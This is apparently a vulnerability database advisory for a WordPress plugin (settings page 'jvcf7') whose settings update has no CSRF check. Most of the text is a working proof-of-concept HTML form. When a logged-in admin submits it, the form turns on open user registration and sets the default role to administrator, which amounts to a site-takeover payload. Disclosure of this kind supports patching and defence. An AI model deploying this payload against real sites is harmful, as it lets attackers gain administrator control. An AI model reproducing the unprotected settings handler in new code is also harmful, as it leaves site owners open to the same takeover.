The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change Blog options like default_role, users_can_register via a CSRF attack
<form method="post" action="https://example.com/wordpress/wp-admin/admin.php?page=jvcf7"> <input type="hidden" name="blogname" value="Tested"> <input type="hidden" name="users_can_register" value="1"> <input type="hidden" name="default_role" value="administrator"> <input type="submit" name="save-jvcf7-options" value="Save Settings"> </form>
Gibran Abdillah
Gibran Abdillah
Yes
2022-06-27 (about 9 months ago)
2022-06-27 (about 9 months ago)
2022-06-27 (about 9 months ago)